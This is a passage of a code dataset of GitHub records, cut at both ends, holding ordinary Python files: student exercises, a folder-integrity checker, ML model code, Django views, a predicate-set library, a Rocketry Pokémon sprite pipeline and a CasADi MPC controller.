sehingga\r\nsetiap elemen hanya dipisahkan dengan \",\". Hilangkan { dan } yang ada di awal\r\ndan akhir input, kemudian buat menjadi set baru a_set dengan setiap elemennya\r\ndipisahkan oleh \", \". Simpan elemen-elemen yang ada di a_set ke dalam\r\ncurr_set, dan simpan irisan curr_set dengan a_set berikutnya di intersections.\r\nSetelah semua set masuk ke curr_set, hilangkan elemen-elemen yang ada di\r\nintersections dari curr_set.\r\n'''\r\n\r\nintersections = set()\r\nfor i in range(set_qty):\r\n a_set = input().replace(' ', '').strip('{}')\r\n a_set = set(a_set.split(','))\r\n if i > 0:\r\n intersections |= curr_set & a_set\r\n curr_set |= a_set\r\ncurr_set -= intersections\r\n\r\n'''\r\nMenghilangkan string kosong yang mungkin ada di curr_set jika ada tepat satu\r\nset yang diinput yang hanya memiliki tepat satu elemen (tidak ada \", \").\r\nKemudian menghilangkan tanda ' karena elemen-elemen curr_set masih bertipe\r\nstring.\r\n'''\r\ncurr_set.discard('')\r\nprint(str(curr_set).replace(\"'\", \"\"))\r\n","repo_name":"laymonage/TarungLabDDP1","sub_path":"lab/06/lab06_b_d.py","file_name":"lab06_b_d.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"id","doc_type":"code","stars":24,"dataset":"github-code","pt":"78"} +{"seq_id":"24679043832","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 19 11:47:03 2018\n\n@author: joykumardas\n\"\"\"\n\ndef fib(n):\n a,b = 1,1\n for i in range(n-1):\n a,b = b,a+b\n return a\nprint(fib(5))","repo_name":"bitsreset/python","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42800944433","text":"import os, sys, datetime, shutil, subprocess\r\n\r\n\r\nclass integrity:\r\n def __init__(self,args=[]):\r\n '''\r\n input_dir -> str:\r\n Input directory for integrity analysis\r\n \r\n report_path -> str:\r\n Integrity report path\r\n\r\n mode -> str: c or v\r\n c = create: To generate integrity report\r\n v = verify: To verify integrity report\r\n\r\n options -> dict:\r\n Other flags and options for execution\r\n - force -> str: Overwrite any existing reports\r\n\r\n other intermittent variables used:\r\n - resp: response of user inputs or subprocess outputs\r\n '''\r\n\r\n # defining object variables\r\n self.input_dir: str = ''\r\n self.report_path: str = ''\r\n self.mode: str = ''\r\n self.options: dict = {\r\n 'force': False\r\n }\r\n\r\n # execution\r\n self.parse_inputs(args)\r\n self.exec()\r\n \r\n # Functions for inputs ----------------------------------\r\n def parse_inputs(self,args):\r\n if args:\r\n self.get_argument_inputs(args)\r\n self.stats()\r\n else:\r\n self.intro()\r\n self.get_manual_inputs()\r\n\r\n \r\n def get_argument_inputs(self,args):\r\n '''\r\n flags:\r\n -i: set input folder\r\n -r: set report path\r\n -f: set force flag\r\n '''\r\n\r\n self.input_dir = args[args.index('-i')+1]\r\n\r\n if 'c' in args: self.mode = 'c'\r\n elif 'v' in args: self.mode = 'v'\r\n\r\n if '-r' in args:\r\n resp = args[args.index('-r')+1]\r\n if os.path.isdir(resp): resp += '\\\\integrity_report.txt'\r\n else: resp = self.input_dir + '\\\\integrity_report.txt'\r\n self.report_path = resp\r\n \r\n if '-f' in args: self.options['force'] = True\r\n\r\n\r\n def get_manual_inputs(self):\r\n self.input_dir = input('\\nEnter input folder: ')\r\n\r\n resp = int(input('\\nSelect operation: 1. Create, 2. Verify\\nSelection: '))\r\n self.mode = ['c','v'][resp-1]\r\n\r\n ops = [\r\n 'Enter path to save report file (leave blank if you want to save it in the input folder)',\r\n 'Enter path of report file (leave blank if the report is present in the input folder)'\r\n ]\r\n resp = input(f'\\n{ops[resp-1]}\\nReport path: ')\r\n if not resp: resp = self.input_dir\r\n if os.path.isdir(resp): resp += '\\\\integrity_report.txt'\r\n self.report_path = resp\r\n\r\n\r\n # Execution --------------------------------------------\r\n def exec(self):\r\n if self.mode == 'c': self.create_report()\r\n elif self.mode == 'v': self.verify_report()\r\n\r\n \r\n def create_report(self):\r\n # checking if report file already exists\r\n if os.path.isfile(self.report_path) and not self.options['force']:\r\n resp = input('\\nReport already exists. Do you want to overwrite? (y/n): ').lower()\r\n if resp == 'y': pass\r\n elif resp == 'n': exit()\r\n else: raise ValueError(f'Invalid response: \"{resp}\" ')\r\n\r\n # priting execution time\r\n timestamp = datetime.datetime.now()\r\n timestamp_formatted = timestamp.strftime(\"%B %d, %Y %I:%M:%S %p\")\r\n print(f'\\n* {timestamp_formatted}\\n')\r\n \r\n # execution: getting current tree structure\r\n print('• Running tree command : running',end='\\r',flush=True)\r\n cmd = f'tree /f /a \"{self.input_dir}\"'\r\n resp = subprocess.run(cmd, shell=True, capture_output=True)\r\n data = resp.stdout.decode('utf-8').split('\\r\\n')\r\n clear_line()\r\n print('• Running tree command : done',end='\\n',flush=True)\r\n\r\n # execution: attaching timestamp\r\n print('• Attaching timestamp : running',end='\\r',flush=True)\r\n data[1] += f' | {timestamp_formatted}'\r\n clear_line()\r\n print('• Attaching timestamp : done',end='\\n',flush=True)\r\n\r\n # execution: saving report file\r\n print('• Saving report file : running',end='\\r',flush=True)\r\n with open(self.report_path, 'w') as file:\r\n file.write('\\n'.join(data))\r\n clear_line()\r\n print('• Saving report file : done',end='\\n',flush=True)\r\n\r\n\r\n def verify_report(self):\r\n # excution: reading report data\r\n print('\\n• Reading report data : running',end='\\r',flush=True)\r\n with open(self.report_path,'r') as file:\r\n data = file.read()\r\n report_data = data.split('\\n')\r\n clear_line()\r\n print('• Reading report data : done',end='\\n',flush=True)\r\n\r\n # execution: getting current tree structure\r\n print('• Running tree command : running',end='\\r',flush=True)\r\n cmd = f'tree /f /a \"{self.input_dir}\"'\r\n resp = subprocess.run(cmd, shell=True, capture_output=True)\r\n current_data = resp.stdout.decode('utf-8').split('\\r\\n')\r\n clear_line()\r\n print('• Running tree command : done',end='\\n',flush=True)\r\n\r\n # execution: remove if integrity file entry exists\r\n val = '| integrity_report.txt'\r\n print('• Removing report entry : running',end='\\r',flush=True)\r\n if val in report_data: report_data.remove(val)\r\n if val in current_data: current_data.remove(val)\r\n clear_line()\r\n print('• Removing report entry : done',end='\\n',flush=True) \r\n\r\n # execution: Integrity check\r\n print('\\nIntegrity check:')\r\n timestamp = report_data[1].split(' | ')[-1]\r\n print(f'Report generated on : {timestamp}')\r\n if report_data[3:] == current_data[3:]: print('Integrity test : Passed',end='\\n',flush=True)\r\n else: print('Integrity test : Failed',end='\\n',flush=True)\r\n pass\r\n\r\n \r\n\r\n # Object representation --------------------------------\r\n def __repr__(self):\r\n repr = f'Integrity(\\n\\tinput_dir: \"{self.input_dir}\"\\n\\toperation: {[\"create\",\"verify\"][[\"c\",\"v\"].index(self.mode)]}\\n\\treport_path: \"{self.report_path}\"\\n\\toptions: {self.options}\\n)'\r\n return repr\r\n \r\n\r\n def intro(self):\r\n os.system('title Folder Integrity')\r\n term_width = shutil.get_terminal_size()[0]\r\n title = f'{\"-\"*5} FOLDER INTEGRITY {\"-\"*5}'.center(term_width)\r\n print(title)\r\n\r\n \r\n def stats(self):\r\n self.intro()\r\n print(f'\\nInput folder: \"{self.input_dir}\"')\r\n print(f'Report path: \"{self.report_path}\"')\r\n print(f'Operation: {[\"CREATE\",\"VERIFY\"][[\"c\",\"v\"].index(self.mode)]}', end='')\r\n if self.options['force']: print(f' -FORCE')\r\n else: print()\r\n\r\n\r\ndef clear_line():\r\n width = shutil.get_terminal_size()[0]\r\n print(\" \"*width,end='\\r')\r\n\r\n\r\nif __name__ == '__main__':\r\n os.system('cls')\r\n args = sys.argv[1:]\r\n obj = integrity(args)\r\n","repo_name":"SeshuTarapatla/Folder-Integrity","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5542765881","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nimport numpy as np\n\nclass PositionalEncoding(tf.keras.Model):\n \"\"\"\n reference: https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/r2/tutorials/text/transformer.ipynb#scrollTo=1Rz82wEs5biZ\n\n \"\"\"\n def __init__(self, max_len_position, embed_dim):\n super(PositionalEncoding, self).__init__(name='PositionalEncoding')\n self.pos_encoding = self.positional_encoding(max_len_position, embed_dim)\n\n def get_angles(self, pos, i, d_model):\n angle_rates = 1 / np.power(10000, (2 * (i // 2)) / np.float32(d_model))\n return pos * angle_rates\n\n def positional_encoding(self, max_len_position, embed_dim):\n angle_rads = self.get_angles(np.arange(max_len_position)[:, np.newaxis],\n np.arange(embed_dim)[np.newaxis, :], embed_dim)\n\n # apply sin to even indices in the array; 2i\n sines = np.sin(angle_rads[:, 0::2])\n # apply cos to odd indices in the array; 2i+1\n cosines = np.cos(angle_rads[:, 1::2])\n pos_encoding = np.concatenate([sines, cosines], axis=-1)\n pos_encoding = pos_encoding[np.newaxis, ...]\n\n return tf.cast(pos_encoding, dtype=tf.float32)\n\n\n def call(self, x):\n seq_len = tf.shape(x)[1]\n return self.pos_encoding[:, :seq_len, :]\n\n\ndef main():\n print(\"PositionalEncoding\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"eagle705/bert","sub_path":"model/embedding/positional_encoding.py","file_name":"positional_encoding.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"43381739712","text":"from Matriz import Matriz_O\n\nfila = 3\ncolumna = 3\nMatrix = Matriz_O()\ndato =\"BBW WWB BWW\"\n##lista = list()\n#cont =0\nfor i in dato:\n##lista.append(cont, i)\n#cont+=1\n print(i)\n\nlista = list(dato)\n\n##cont=0\n\nfor i in range(1,fila+1):\n for j in range(1,columna+1):\n ##Matrix.ingresardatos(lista.pop(cont),i,j)\n ##cont+=1\n Matrix.ingresardatos(lista.pop(0),i,j)\n print(str(i)+\" \",str(j)+\" \",str(i+j))\nprint(\"------------------------------------------------------------\")\nprint(Matrix.mostrarMatriz())","repo_name":"BrayanPradoMarroquin/Tutorias_TDAS","sub_path":"MATRICES/ORTOGONAL/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"36876848826","text":"import torch\nimport torch.nn as nn\nimport torchvision\n\nclass vgg16_FCN(nn.Module):\n THIRD_POOLING_INDEX = 16\n FORTH_POOLING_INDEX = 23\n def __init__(self, n_class = 1):\n super(vgg16_FCN, self).__init__()\n self.vgg16 = torchvision.models.vgg16(pretrained=True).features\n \n self.fc6 = nn.Conv2d(512, 4096, 1)\n self.relu6 = nn.ReLU(inplace=True)\n self.droput6 = nn.Dropout2d()\n \n self.fc7 = nn.Conv2d(4096, 4096, 1)\n self.relu7 = nn.ReLU(inplace=True)\n self.droput7 = nn.Dropout2d()\n \n self.direct_score = nn.Conv2d(4096, n_class, 1)\n self.third_pool = nn.Conv2d(256, n_class, 1)\n self.forth_pool = nn.Conv2d(512, n_class, 1)\n \n self.upscore2 = nn.ConvTranspose2d(n_class, n_class, 2, stride=2, bias=False)\n self.upscore_pool4 = nn.ConvTranspose2d(n_class, n_class, 2, stride=2, bias=False)\n self.upscore8 = nn.ConvTranspose2d(n_class, n_class, 8, stride=8, bias=False)\n \n def forward(self, batch):\n prev_layer_output = batch\n layers_outputs = []\n with torch.no_grad():\n for i, layer in enumerate(self.vgg16):\n prev_layer_output = layer(prev_layer_output)\n layers_outputs.append(prev_layer_output)\n \n h = prev_layer_output\n \n h = self.fc6(h)\n h = self.relu6(h)\n h = self.droput6(h)\n\n h = self.fc7(h)\n h = self.relu7(h)\n h = self.droput7(h)\n \n direct_score = self.direct_score(h)\n direct_score = self.upscore2(direct_score)\n \n third_pooling_output = layers_outputs[vgg16_FCN.THIRD_POOLING_INDEX]\n forth_pooling_output = layers_outputs[vgg16_FCN.FORTH_POOLING_INDEX]\n \n forth_pool_skip_conection = self.forth_pool(forth_pooling_output)\n h = direct_score + forth_pool_skip_conection\n h = self.upscore_pool4(h)\n \n third_pool_skip_connection = self.third_pool(third_pooling_output)\n \n h = h + third_pool_skip_connection\n \n h = self.upscore8(h)\n \n return h","repo_name":"ArtemBoyarintsev/cell_segmentation","sub_path":"FCN.py","file_name":"FCN.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40549570456","text":"from django.http import Http404\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\nfrom rest_framework import status, authentication, permissions\n\nfrom .models import MyUser\nfrom .serializers import MyUserSerializer\n\n\nclass MyUserDetail(APIView):\n\tdef get(self, request, username, format=None):\n\t\tuser = User.objects.get(username=username)\n\t\tprofile = MyUser.objects.get(user=user)\n\t\tserializer = MyUserSerializer(profile)\n\t\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\n@authentication_classes([authentication.TokenAuthentication])\n@permission_classes([permissions.IsAuthenticated])\ndef create_profile(request):\n\t\tprofile = MyUser(user=request.user,name=request.data['username'])\n\t\tprofile.save()\n\t\tserializer = MyUserSerializer(profile)\n\t\treturn Response(serializer.data, status.HTTP_201_CREATED)\n\n\n@api_view(['POST'])\n@authentication_classes([authentication.TokenAuthentication])\n@permission_classes([permissions.IsAuthenticated])\ndef follow_or_unfollow(request):\n\t\tfollowed_user = User.objects.get(username=request.data['username'])\n\t\tuser = MyUser.objects.get(user=request.user)\n\t\tif followed_user in user.friends.all():\n\t\t\tuser.friends.remove(followed_user)\n\t\t\treturn Response(\"user deleted\")\n\t\telse:\n\t\t\tserializer = MyUserSerializer(followed_user)\n\t\t\tuser.friends.add(followed_user)\n\t\t\treturn Response(serializer.data, status.HTTP_201_CREATED)\n\n\n@api_view(['GET'])\n@authentication_classes([authentication.TokenAuthentication])\n@permission_classes([permissions.IsAuthenticated])\ndef get_followed(request):\n\t\tuser = MyUser.objects.get(user=request.user)\n\t\tfollowed = []\n\t\tfor friend in user.friends.all():\n\t\t\tfollowed.append(User.objects.get(pk=friend.id))\n\t\tserializer = MyUserSerializer(followed, many=True)\n\t\treturn Response(serializer.data)\n\n\n@api_view(['PUT'])\n@authentication_classes([authentication.TokenAuthentication])\n@permission_classes([permissions.IsAuthenticated])\ndef update_profile(request):\n\tprofile = MyUser.objects.get(user=request.user)\n\tprofile.bio_description = request.data[\"bio_description\"]\n\tprofile.name = request.data[\"name\"]\n\ttry:\n\t\tprofile.profile_image_url = request.data['profile_image']\n\texcept:\n\t\tpass\n\ttry:\n\t\tprofile.cover_image_url = request.data['cover_image']\n\texcept:\n\t\tpass\n\tprofile.save()\n\tserializer = MyUserSerializer(profile)\n\treturn Response(serializer.data)\n\n\nclass SearchUser(APIView):\n\t\tdef get(self, request, query, format=None):\n\t \t\tusers = MyUser.objects.filter(Q(name__icontains=query))\n\t \t\tserializer = MyUserSerializer(users, many=True)\n\t \t\treturn Response(serializer.data)\n\n","repo_name":"PallasCodes/microddit_api","sub_path":"myuser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37479556914","text":"from rest_framework import serializers\nfrom database.models import Company\n\n\nclass CompanySerializer(serializers.ModelSerializer):\n class Meta:\n model = Company\n fields = \"__all__\"\n\n def create(self, validated_data):\n company = Company(\n company_name=validated_data['company_name']\n )\n company.save()\n return company\n","repo_name":"WobitaDream/Django_NewPointPlus","sub_path":"django/v1_shop/serializers/company_serializers.py","file_name":"company_serializers.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2818301667","text":"\"\"\"\nThis module provides implementations of Predicate Sets.\nA predicate set is a collection of predicates that are\nall evaluated against a single input to find all matching\npredicates. It provides both a naive implementation that\nsequentially evaluates predicates, as well as an optimizing\nimplementation.\n\"\"\"\nfrom .merge import merge, refactor\nfrom .predicate import LiteralResolver\nfrom . import ast\n\n\nclass PredicateSet(object):\n \"\"\"\n This class implements a naive predicate set. It provides\n no optimizations and does a sequential evaluation of\n each predicate.\n \"\"\"\n def __init__(self, preds=None):\n self.predicates = set([])\n if preds:\n self.update(preds)\n\n def add(self, p):\n \"Updates the set with a new predicate\"\n self.update([p])\n\n def update(self, preds):\n \"Update the set with a union of the new predicates\"\n for p in preds:\n if not p.is_valid():\n raise ValueError(\"Invalid predicate provided!\")\n self.predicates.update(preds)\n\n def evaluate(self, doc):\n \"\"\"\n Evaluates the predicates against the document.\n Returns a list of matching predicates\n \"\"\"\n match = []\n for p in self.predicates:\n if p.evaluate(doc):\n match.append(p)\n return match\n\n\nclass OptimizedPredicateSet(LiteralResolver):\n \"\"\"\n This class implements an optimizing predicate set.\n Internally, the predicates are rewritten and merged\n into a single AST that can be evaluated in a single pass.\n \"\"\"\n def __init__(self, preds=None, settings=None):\n LiteralResolver.__init__(self)\n self.settings = settings\n self.predicates = set([])\n self.ast = None\n self.finalized = False\n if preds:\n self.update(preds)\n\n def add(self, p):\n \"\"\"\n Updates the set with a new predicate. This will invalidate\n the current AST. It is not recommended to interleave add/evaluate.\n \"\"\"\n self.update([p])\n\n def update(self, preds):\n \"Update the set with a union of the new predicates\"\n if self.finalized:\n raise Exception(\"Cannot alter a finalized set!\")\n\n for p in preds:\n if not p.is_valid():\n raise ValueError(\"Invalid predicate provided!\")\n\n old_l = len(self.predicates)\n self.predicates.update(preds)\n if len(self.predicates) != old_l:\n self.ast = None\n\n def description(self, max_depth=0):\n \"Provides a tree like human readable description of the predicate\"\n if self.ast is None:\n self.compile_ast()\n return self.ast.description(max_depth=max_depth)\n\n def evaluate(self, doc):\n \"\"\"\n Evaluates the predicates against the document.\n Returns a list of matching predicates\n \"\"\"\n if self.ast is None:\n self.compile_ast()\n\n # Set the results array so that the ast can push the matches\n results = []\n self._results = results\n\n # Evaluate\n self.ast.evaluate(self, doc)\n\n # Reset the results array and return this instance\n self._results = None\n return results\n\n def analyze(self, document):\n \"\"\"\n Evaluates a predicate against the input document,\n while trying to provide additional information about\n the cause of failure. This is generally much slower\n that using the equivilent `evaluate`.\n\n Returns a tuple of (Result, Matches, Ctx).\n Result is a boolean, Matches a list of predices\n and ctx is the evaluation context, containing among other\n things the failure reasons and all of the literal resolution values.\n The failed attribute has all the failure reasons in order.\n The literals attribute contains the resolved values for all literals.\n \"\"\"\n if self.ast is None:\n self.compile_ast()\n\n # Set the results array so that the ast can push the matches\n results = []\n self._results = results\n\n # Analyze\n res, ctx = self.ast.analyze(self, document)\n\n # Reset the results array and return this instance\n self._results = None\n return res, results, ctx\n\n def compile_ast(self):\n \"\"\"\n Forces compilation of the internal ast tree.\n This must be done after any changes to the set of\n predicates.\n \"\"\"\n if self.finalized:\n raise Exception(\"Cannot compile a finalized set!\")\n if self.predicates:\n merged = merge(list(self.predicates))\n self.ast = refactor(self, merged, self.settings)\n else:\n self.ast = ast.Constant(True)\n\n def push_match(self, match):\n \"\"\"\n This method is only to be invoked by the AST tree\n to push results during an evaluation.\n \"\"\"\n self._results.append(match)\n\n def finalize(self):\n \"\"\"\n This method can be invoked to 'finalize'. Once\n this is done, the set cannot be altered. However,\n lots of extraneous data can be purged to save memory.\n\n This WILL clear the predicate string and AST from all\n input predicates. Use only with caution.\n \"\"\"\n # Ensure the AST if compiled first\n if self.ast is None:\n self.compile_ast()\n\n # Clear the sub-AST's and string predicates\n for p in self.predicates:\n p.predicate = None\n p.ast = None\n\n # Remove our set, the AST has it\n self.predicates = None\n\n # Set as finalized\n self.finalized = True\n\n","repo_name":"armon/pypred","sub_path":"pypred/set.py","file_name":"set.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"78"} +{"seq_id":"23922919870","text":"import logging\nfrom os import makedirs\nfrom pathlib import Path\nfrom datetime import date\nfrom random import randint\n\nfrom rocketry import Rocketry\nfrom httpx import AsyncClient, stream\nfrom rocketry.args import Arg, Return\nfrom rocketry.conds import (\n after_success, \n after_finish,\n after_fail\n )\n\n# logger configuration\n\"\"\"\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.DEBUG)\ntask_logger = logging.getLogger('rocketry.task')\ntask_logger.addHandler(handler)\n\"\"\"\n\nPOKE_API = \"https://pokeapi.co/api/v2/pokemon/{}\"\nDOLAR_API = \"https://economia.awesomeapi.com.br/json/daily/USD-AOA/?start_date={}&end_date={}\"\n\nscheduler = Rocketry(execution='async')\n\n@scheduler.param('date')\ndef random_date_generator() -> str:\n \"\"\"generate random date and formate\"\"\"\n day = randint(1, 28)\n month = randint(1, 12)\n year = randint(2021, 2022)\n\n random_date = date.today()\\\n .replace(day=day, month=month, year=year)\n\n formated_date = random_date.strftime('%Y%m%d')\n return formated_date\n\n@scheduler.task('every 5s', name='get quotation of dollar')\nasync def get_dollar(date: str=Arg('date')) -> str:\n \"\"\"get dollar quotation of economia api\"\"\"\n async with AsyncClient() as client:\n response = (await client.get(DOLAR_API.format(date, date))).json()\n\n if response: \n return response[0]['high'][:3] # 569.628 -> 569\n\n@scheduler.task(after_fail(get_dollar))\ndef get_dollar_fail():\n \"\"\"get dollar fail, here we can notify that the process fail or anything\"\"\"\n print(\"get dollar fail\")\n\n@scheduler.task(after_success(get_dollar))\nasync def get_pokemon_json(dollar: str = Return(get_dollar)) -> list:\n \"\"\"get pokemon by dollar formated dollar\"\"\"\n async with AsyncClient() as client:\n response = (await client.get(POKE_API.format(dollar))).json()\n return response\n\n@scheduler.task(after_fail(get_pokemon_json))\ndef get_pokemon_json_fail():\n \"\"\"get pokemon fail, here we can notify that the process fail or anything\"\"\"\n print(\"get pokenom fail\")\n\n@scheduler.task(after_success(get_pokemon_json))\ndef get_pokemon_sprite_url(poke_json: list = Return(get_pokemon_json)):\n \"\"\"return only the default front sprite of prokemon and the name\"\"\"\n return poke_json['sprites']['front_default'], poke_json['name']\n\n@scheduler.task(after_success(get_pokemon_sprite_url))\ndef download_pokemon_sprite(\n poke_data: tuple = Return(get_pokemon_sprite_url),\n poke_number: str = Return(get_dollar) \n ):\n \"\"\"get poke data to download\"\"\" \n url, name = poke_data\n \n file = Path(f'{poke_number}_{name}.png')\n with open(file, 'wb') as download_file:\n with stream('GET', url) as strm:\n for chunk in strm.iter_bytes():\n download_file.write(chunk)\n \n return file\n\n@scheduler.task(after_finish(download_pokemon_sprite))\ndef move_sprite(path: Path = Return(download_pokemon_sprite)):\n \"\"\"move the sprite download to a dir\"\"\" \n makedirs('sprites', exist_ok=True)\n\n folder = Path('sprites')\n path.rename(folder / path)\n\nscheduler.run()\n","repo_name":"Antonio-Gabriel/pokedollar_pipeline_rocketry","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33187107643","text":"# program sortJual\n# Membaca sebuah file lalu mengurutkan berdasarkan\n# kategori KdProduknya dan menampilkan hasilnya\n# ke layar.\n\nimport tulisdata\n\n# KAMUS\n# constant MARK : string = \"99999999\"\nMARK = \"99999999\"\n\n# type dataJual : \n\n# f : SEQFILE of dataJual\n# (*) data : string\n# (1) \"99999999\"\n\n# db : Array of dataJual\n# namafile: string\n\n# ALGORITMA PROGRAM UTAMA\nnamafile = input()\ntulisdata.TulisDataJual(namafile)\n\nf = open(namafile, \"r\")\ndata = f.readline()\ndb = []\n\nif data == MARK:\n print(\"File kosong\")\nelse:\n while(data != MARK):\n obj = {}\n obj[\"KdKategori\"] = data[:-1]\n obj[\"KdProduk\"] = f.readline()[:-1]\n obj[\"Hasil\"] = int(f.readline())\n db.append(obj)\n\n data = f.readline()\n \n # SORTING\n for i in range(len(db)):\n minKategori = i\n\n for j in range(i,len(db)):\n if(db[minKategori][\"KdKategori\"] > db[j][\"KdKategori\"]):\n minKategori = j\n \n # SWAPPING\n tmp = db[i]\n db[i] = db[minKategori]\n db[minKategori] = tmp\n \n # Pencetakan ke layar\n for i in db:\n print(\"%s,%s,%d\" % (i[\"KdKategori\"], i[\"KdProduk\"], i[\"Hasil\"]))\n\n","repo_name":"bayusamudra5502/Daspro","sub_path":"Prosedural/Praktikum 6/sortjual.py","file_name":"sortjual.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1131773882","text":"from casadi import * # type: ignore\nimport random \nimport matplotlib.pyplot as plt # type: ignore\nimport numpy as np\nimport time\nimport math\n\nclass IO_linearization_MPC:\n \"\"\"Class for a Nonlinear Model Predictive Control law based using Casadi \n \"\"\"\n def __init__(self,horizon, b, dt):\n \"\"\"Init func\n Args:\n horizon (float): how many steps to look into the future\n input_constraint (np.array): control constraints\n state_constraints (np.array): state contraints\n dt (float): sampling time\n \"\"\"\n self.N = horizon\n self.acc_max = 5\n\n self.b = b\n \n\n self.n_actionsMPC = 2\n self.dt = dt\n self.numberState = 2\n\n self.Q_pos = 100\n self.R = 10\n\n self.initialize_casadi()\n\n\n def reset(self,):\n \"\"\"Every control class should have a reset function\n \"\"\"\n return\n\n\n def initialize_casadi(self):\n \"\"\"Initialize the casadi optimal control problem\n \"\"\"\n\n # Casadi problem formulation ---------------------------------------\n self.opti = Opti() # Optimization problem\n \n # Decision variables ---------------------------------------\n self.X_casadi = self.opti.variable(self.numberState,self.N+1) # state trajectory\n self.x_casadi = self.X_casadi[0,:]\n self.y_casadi = self.X_casadi[1,:]\n \n\n self.U_casadi = self.opti.variable(self.n_actionsMPC,self.N) # control trajectory\n\n # Initial State Constraint -----------------------------------\n self.x_0 = self.opti.parameter()\n self.y_0 = self.opti.parameter()\n \n self.opti.subject_to(self.x_casadi[0]==self.x_0)\n self.opti.subject_to(self.y_casadi[0]==self.y_0)\n \n\n # State Constraints and Cost Function -------------------------\n self.set_kinematics()\n self.set_constraints()\n self.set_cost_function()\n \n # Solver parameters ---------------------------------------\n p_opts = dict(print_time=False, verbose=False) \n s_opts = dict(print_level=0)\n self.opti.solver(\"ipopt\",p_opts,s_opts) # set numerical backend\n\n\n def set_kinematics(self):\n \"\"\"Setting the kinematics constraints\n \"\"\"\n # Kynematic Constraints ---------------------------------------\n for k in range(self.N): # loop over control intervals\n next_x = self.X_casadi[0,k] + self.U_casadi[0,k]*self.dt\n next_y = self.X_casadi[1,k] + self.U_casadi[1,k]*self.dt\n \n self.opti.subject_to(self.X_casadi[0,k+1]==next_x) # close the gaps\n self.opti.subject_to(self.X_casadi[1,k+1]==next_y) # close the gaps\n \n \n def set_constraints(self):\n \"\"\"Setting input constraints\n \"\"\"\n for k in range(self.N): # loop over control intervals\n #linear velocity\n self.opti.subject_to(self.U_casadi[0,k] <= self.acc_max)\n self.opti.subject_to(self.U_casadi[0,k] >= -self.acc_max)\n #angular velocity\n self.opti.subject_to(self.U_casadi[1,k] <= self.acc_max)\n self.opti.subject_to(self.U_casadi[1,k] >= -self.acc_max)\n\n\n\n def set_cost_function(self):\n \"\"\"Setting the cost function\n \"\"\"\n\n # Parametric Cost Function -------------------------------------\n pose_error = 0\n input_use = 0\n \n self.reference_x = self.opti.parameter(self.N+1)\n self.reference_y = self.opti.parameter(self.N+1)\n \n\n\n for k in range(1, self.N):\n ref_x = self.reference_x[k-1]\n ref_y = self.reference_y[k-1]\n \n\n pose_error += self.Q_pos*(self.x_casadi[k] - ref_x)@(self.x_casadi[k] - ref_x).T\n pose_error += self.Q_pos*(self.y_casadi[k] - ref_y)@(self.y_casadi[k] - ref_y).T\n \n ref_u1 = 0\n ref_u2 = 0\n\n input_use += self.R*(self.U_casadi[0,k] - ref_u1)@(self.U_casadi[0,k] - ref_u1).T \n input_use += self.R*(self.U_casadi[1,k] - ref_u2)@(self.U_casadi[1,k] - ref_u2).T \n \n \n # Last step N horizon -----------------------------------------------------------------------\n ref_x = self.reference_x[self.N]\n ref_y = self.reference_y[self.N]\n pose_error += self.Q_pos*(self.x_casadi[self.N] - ref_x)@(self.x_casadi[self.N] - ref_x).T\n pose_error += self.Q_pos*(self.y_casadi[self.N] - ref_y)@(self.y_casadi[self.N] - ref_y).T\n \n self.opti.minimize(pose_error + input_use)\n\n\n def compute_control(self, initial_state, reference_x, reference_y):\n \"\"\"Compute the control actions\n Args:\n initial_state (np.array): actual state of the robot\n reference_x (np.array): x reference for the robot\n reference_y (np.array): y reference for the robot\n Returns:\n (np.array): control actions\n \"\"\"\n\n # Setting Initial State ---------------------------------------\n start_time = time.time()\n self.opti.set_value(self.x_0, initial_state[0])\n self.opti.set_value(self.y_0, initial_state[1])\n \n # Setting Reference ------------------------------------------ \n self.opti.set_value(self.reference_x, reference_x)\n self.opti.set_value(self.reference_y, reference_y)\n \n # Compute solution ---------------------------------------\n start_time = time.time()\n sol = self.opti.solve()\n \n # Taking just first action ---------------------------------------\n u1_io = sol.value(self.U_casadi)[0]\n u2_io = sol.value(self.U_casadi)[1]\n\n state_yaw = initial_state[2]\n v = math.cos(state_yaw)*u1_io + math.sin(state_yaw)*u2_io\n w = (-math.sin(state_yaw)*u1_io/self.b) + (math.cos(state_yaw)*u2_io/self.b)\n\n\n return v[0], 